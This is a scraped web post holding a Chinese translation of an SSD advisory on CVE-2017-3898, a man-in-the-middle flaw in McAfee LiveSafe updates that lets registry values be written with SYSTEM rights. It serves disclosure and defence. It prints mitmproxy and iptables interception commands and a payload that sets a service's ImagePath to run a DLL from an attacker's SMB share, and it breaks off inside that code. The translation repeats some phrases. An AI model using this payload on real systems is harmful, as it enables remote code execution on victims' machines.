{"id":10483,"date":"2017-11-14T14:19:21","date_gmt":"2017-11-14T22:19:21","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/14\/news-4255\/"},"modified":"2017-11-14T14:19:21","modified_gmt":"2017-11-14T22:19:21","slug":"news-4255","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/14\/news-4255\/","title":{"rendered":"SSD \u5b89\u5168\u516c\u544a-McAfee LiveSafe MiTM \u6ce8\u518c\u8868  \u4fee\u6539\u5bfc\u81f4\u8fdc\u7a0b\u6267\u884c\u547d\u4ee4\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 14 Nov 2017 12:11:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3522\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3522');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728 McAfee LiveSafe (MLS) \u4e2d\u5b58\u5728\u7684\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u5f71\u54cd\u4e86McAfee LiveSafe\uff08MLS\uff0916.0.3 \u4e4b\u524d\u5168\u90e8\u7248\u672c. \u4e4b\u524d\u5168\u90e8\u7248\u672c. \u6f0f\u6d1e\u5141\u8bb8\u7f51\u7edc\u653b\u51fb\u8005\u901a\u8fc7\u7be1\u6539 HTTP \u540e\u7aef\u54cd\u5e94, \u8fdb\u800c\u4fee\u6539\u4e0e McAfee \u66f4\u65b0\u76f8\u5173\u7684 Windows \u6ce8\u518c\u8868\u503c.<\/p>\n<p>McAfee Security Scan Plus \u662f\u4e00\u4e2a\u514d\u8d39\u7684\u8bca\u65ad\u5de5\u5177,\u901a\u8fc7\u4e3b\u52a8\u5730\u68c0\u67e5\u8ba1\u7b97\u673a\u4e2d\u6700\u65b0\u7684\u9632\u75c5\u6bd2\u8f6f\u4ef6\u3001\u9632\u706b\u5899\u548c\u7f51\u7edc\u5b89\u5168\u8f6f\u4ef6\u66f4\u65b0,\u786e\u4fdd\u7528\u6237\u514d\u53d7\u5a01\u80c1,\u540c\u65f6\u8fd8\u4f1a\u626b\u19ff\u6b63\u5728\u8fd0\u884c\u7a0b\u5e8f\u4e2d\u7684\u5a01\u80c1.<\/p>\n<p><strong>\u6f0f\u6d1e\u1a00\u4ea4\u8005<\/strong><br \/> \u4e00\u5bb6\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u516c\u53f8 Silent Signal \u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><br \/> \u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u9488\u5bf9\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u5730\u5740\u3002\u83b7\u53d6\u66f4\u591a\u4fe1\u606f: https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714<br \/> CVE: CVE-2017-3898<\/p>\n<p><span id=\"more-3522\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><br \/> \u7f51\u7edc\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u591a\u4e2a McAfee \u4ea7\u54c1\u4e2d\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\u53d7\u5f71\u54cd\u7684\u4ea7\u54c1\u4f1a\u901a\u8fc7\u660e\u6587 HTTP \u901a\u9053\u4ece http:\/\/COUNTRY.mcafee.com\/apps\/msc\/webupdates\/mscconfig.asp \u4e2d\u68c0\u7d22\u914d\u7f6e\u6570\u636e (\u5176\u4e2d\u7684\u201cCOUNTRY\u201d\u4fee\u6539\u4e3a\u56fd\u5bb6\u7684\u4e24\u5b57\u6bcd\u6807\u8bc6\u7b26,\u4f8b\u5982\u201cuk\u201d)<\/p>\n<p>\u54cd\u5e94\u7684\u6b63\u6587\u5305\u542b XML \u683c\u5f0f\u6570\u636e,\u7c7b\u4f3c\u4e8e\u4e0b\u9762\u7684\u4ee3\u7801:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6be8ca1ea655523747\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;webservice-response response-version=&#8221;1.0&#8243; frequency=&#8221;168&#8243;  verid=&#8221;1#1316#15#0#2&#8243;&gt;  &lt;update&gt;  &lt;reg key=&#8221;HKLMSOFTWAREMcAfeeMSCSettingsInProductTransaction&#8221;  name=&#8221;enable&#8221; type=&#8221;REG_DWORD&#8221; value=&#8221;1&#8243; obfuscate=&#8221;0&#8243;\/&gt;  &lt;\/update&gt;  &lt;\/webservice-response&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>\u4e0a\u8ff0\u54cd\u5e94\u19ff\u8ff0\u4e86\u5728 webservice-response\/update \u8def\u5f84\u4e0b\u4f7f\u7528 reg \u6807\u7b7e\u8fdb\u884c\u6ce8\u518c\u8868\u4fee\u6539\u7684\u884c\u4e3a\u3002<\/p>\n<p>\u6b64\u8bf7\u6c42\u548c\u540e\u7eed\u7684\u66f4\u65b0\u4f1a\u88ab\u81ea\u52a8\u89e6\u53d1\u3002\u9996\u6b21\u89e6\u53d1\u662f\u5728\u8f6f\u4ef6\u5b89\u88c5\u540e\u7531 webservice-request \u8282\u70b9\u7684frequency(\u9891\u7387)\u5c5e\u6027\u6307\u5b9a\u7684\u6570\u5c0f\u65f6\u540e(\u9ed8\u8ba4\u4e3a 168 \u5206\u949f)\u3002<\/p>\n<p>McSvHost.exe \u8fdb\u7a0b\u4f7f\u7528\u7531 mcsvrcnt.exe \u7ee7\u627f\u7684 SYSTEM \u6743\u9650\u8fd0\u884c\u4ece\u800c\u5b9e\u73b0\u6ce8\u518c\u8868\u4fee\u6539 \u5e94\u8be5\u662f McSvHost.exe \u8fdb\u7a0b\u4f7f\u7528\u7531 mcsvrcnt.exe\u8fdb\u7a0b\u7ee7\u627f\u800c\u6765\u7684 SYSTEM \u6743\u9650\u8fd0\u884c\u4ece\u800c\u5b9e\u73b0\u6ce8\u518c\u8868\u4fee\u6539<\/p>\n<p>\u4f7f\u7528 SYSTEM \u6743\u9650\u5199\u5165\u76ee\u6807\u7684\u6ce8\u518c\u8868 \u8ba4\u4e3a \u4ee5SYSTEM \u6743\u9650\u5199\u5165\u76ee\u6807\u7684\u6ce8\u518c\u8868 \u66f4\u597d<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u4f5c\u4e3a\u4ee3\u7406\u6765\u62e6\u622a\u548c\u4fee\u6539\u660e\u6587 HTTP \u8bf7\u6c42\u548c\u54cd\u5e94\u3002\u7531\u4e8e\u76ee\u6807\u8f6f\u4ef6\u5bf9HTTPS \u670d\u52a1\u4f1a\u8fdb\u884c\u8bc1\u4e66\u9a8c\u8bc1,\u56e0\u6b64,\u8ba9\u8fd9\u4e9b\u8fde\u63a5\u4e0d\u7ecf\u8fc7\u4fee\u6539\u5373\u53ef\u901a\u8fc7\u975e\u5e38\u91cd\u8981\u3002<\/p>\n<p>\u5728\u5e38\u89c4 HTTP \u4ee3\u7406\u6a21\u5f0f\u4e0b,\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528 mitmproxy \u7684&#8211;ignore \u547d\u4ee4\u884c\u53c2\u6570\u6765\u5b9e\u73b0:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6be8ca1f3868511547\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> mitmproxy -s mcreggeli_inline.py &#8211;ignore &#8216;.*&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1f3868511547-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1f3868511547-1\"><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mcreggeli_inline<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">py<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">ignore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;.*&#8217;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>\u5728\u900f\u660e\u4ee3\u7406\u6a21\u5f0f\u60c5\u51b5\u4e0b,\u4e0d\u5e94\u1a00\u4f9b\u4e0a\u8ff0\u53c2\u6570:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6be8ca1f6898873646\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  mitmproxy -s mreggeli_inline.py \u2013T<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1f6898873646-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1f6898873646-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mreggeli_inline<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">py<\/span><span class=\"crayon-h\"> <\/span>\u2013<span class=\"crayon-v\">T<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>\u5bf9\u4e8e\u900f\u660e\u4ee3\u7406\u6a21\u5f0f,\u5728\u57fa\u4e8e Debian \u7684 Linux \u53d1\u884c\u7248\u4e0a\u914d\u7f6e NAT \u548c\u7aef\u53e3\u91cd\u5b9a\u5411(eth0 \u662f\u76ee\u6807\u53ef\u89c1\u7684\u63a5\u53e3,eth1 \u8fde\u63a5\u5230\u7f51\u7edc ),\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6be8ca1f8914826258\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> iptables -t nat -A PREROUTING -i eth0 -p tcp   &#8211;dport 80 -j REDIRECT &#8211;to 8080  iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE  sysctl net.ipv4.ip_forward=1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1f8914826258-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1f8914826258-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1f8914826258-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1f8914826258-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1f8914826258-1\"><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PREROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1f8914826258-2\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">dport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REDIRECT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1f8914826258-3\"><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">POSTROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MASQUERADE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1f8914826258-4\"><span class=\"crayon-e\">sysctl <\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ipv4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ip_forward<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>\u8be5\u811a\u672c\u4f1a\u5728\u8bf7\u6c42\u7684 URL \u4e2d\u67e5\u627e\u201cmscconfig.asp\u201d\u5b57\u7b26\u4e32\u3002\u5982\u679c\u53d1\u73b0 XML \u54cd\u5e94\u6b63\u6587\u88ab\u53cd\u5e8f\u5217\u5316,\u5219\u4f1a\u6839\u636e\u5728\u811a\u672c\u5f00\u5934\u58f0\u660e\u7684 REG \u53d8\u91cf,\u6dfb\u52a0\u65b0\u7684 reg \u8282\u70b9\u3002REG \u53d8\u91cf\u662f\u4e00\u4e2a\u5b57\u5178\u5217\u8868,\u6bcf\u4e2a\u5b57\u5178\u90fd\u5305\u542b\u4ee5\u4e0b\u952e:<\/p>\n<ul>\n<li>Key &#8211; \u8981\u4fee\u6539\u7684\u6ce8\u518c\u8868\u9879\u7684\u540d\u79f0(\u4f8b\u5982\u201cHKLMSYSTEMCurrentControlSetServicesmfevtp\u201d,\u5728 Python \u4e2d\u9700\u8981\u6b63\u786e\u8f6c\u4e49\u53cd\u659c\u6760)<\/li>\n<li>Type &#8211; \u8981\u521b\u5efa\u7684\u503c\u7684\u7c7b\u578b(\u4f8b\u5982,\u5b57\u7b26\u4e32\u7684\u201cREG_SZ\u201d)<\/li>\n<li>Name &#8211; \u8981\u521b\u5efa\u7684\u503c\u7684\u540d\u79f0<\/li>\n<li>Value &#8211; \u8981\u521b\u5efa\u7684\u503c<\/li>\n<\/ul>\n<p>\u6b64\u6f0f\u6d1e\u5229\u7528\u8fd8\u4f1a\u5c06 frequency(\u9891\u7387)\u5c5e\u6027\u66f4\u6539\u4e3a 1,\u8fd9\u6837\u4e00\u6765,\u5c31\u53ef\u4ee5\u5728\u66f4\u77ed\u7684\u65f6\u95f4\u5185(1\u5c0f\u65f6\u4e4b\u5185)\u518d\u6b21\u5229\u7528\u6f0f\u6d1e\u3002\u63d2\u5165\u65b0\u8282\u70b9\u540e,\u7531\u6b64\u4ea7\u751f\u7684\u5bf9\u8c61\u88ab\u5e8f\u5217\u5316,\u5e76\u88ab\u7f6e\u4e8e\u539f\u59cb\u54cd\u5e94\u7684\u6b63\u6587\u7684\u4f4d\u7f6e\u3002<\/p>\n<p>\u4e3a\u4e86\u6f14\u793a\u4ee3\u7801\u6267\u884c,\u6211\u4eec\u8986\u5199\u4e86\u53d7\u5f71\u54cd\u7684 McAfee \u4ea7\u54c1(\u5373 mfevtp &#8211; McAfee \u8fdb\u7a0b\u9a8c\u8bc1\u670d\u52a1)\u7684\u4e00\u4e2a\u670d\u52a1\u6761\u76ee: \u5c06 HKLMSYSTEMCurrentControlSetServicesmfevtp \u952e\u7684 ImagePath \u503c\u66ff\u6362\u4e3a\u96c6\u6210\u5728 rundll32.exe \u4e2d\u7684\u6307\u5411\u653b\u51fb\u8005\u4e3b\u673a\u7684 UNC \u8def\u5f84\u53c2\u6570(\u5728\u6d4b\u8bd5\u65f6,\u6211\u4eec\u4f7f\u7528Metasploit \u7684 smb_delivery \u6a21\u5757\u1a00\u4f9b\u7684 payload <test .dll>):<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/McAfee-300x56.jpg\" data-slb-active=\"1\" data-slb-asset=\"826208776\" data-slb-internal=\"0\" data-slb-group=\"3522\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/McAfee-300x56-300x56.jpg\" alt=\"\" width=\"300\" height=\"56\" class=\"alignnone size-medium wp-image-3523\" \/><\/a><\/p>\n<p>REG \u53d8\u91cf\u88ab\u58f0\u660e\u5982\u4e0b:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6be8ca1fc500816493\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> REG=[{&#8220;key&#8221;:&#8221;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;, &#8220;type&#8221;:&#8221;REG_SZ&#8221;,&#8221;name&#8221;:&#8221;ImagePath&#8221;, &#8220;value&#8221;:&#8221;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8243;},]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fc500816493-1\">1<\/div>\n<\/div>\n<\/td>\n<td 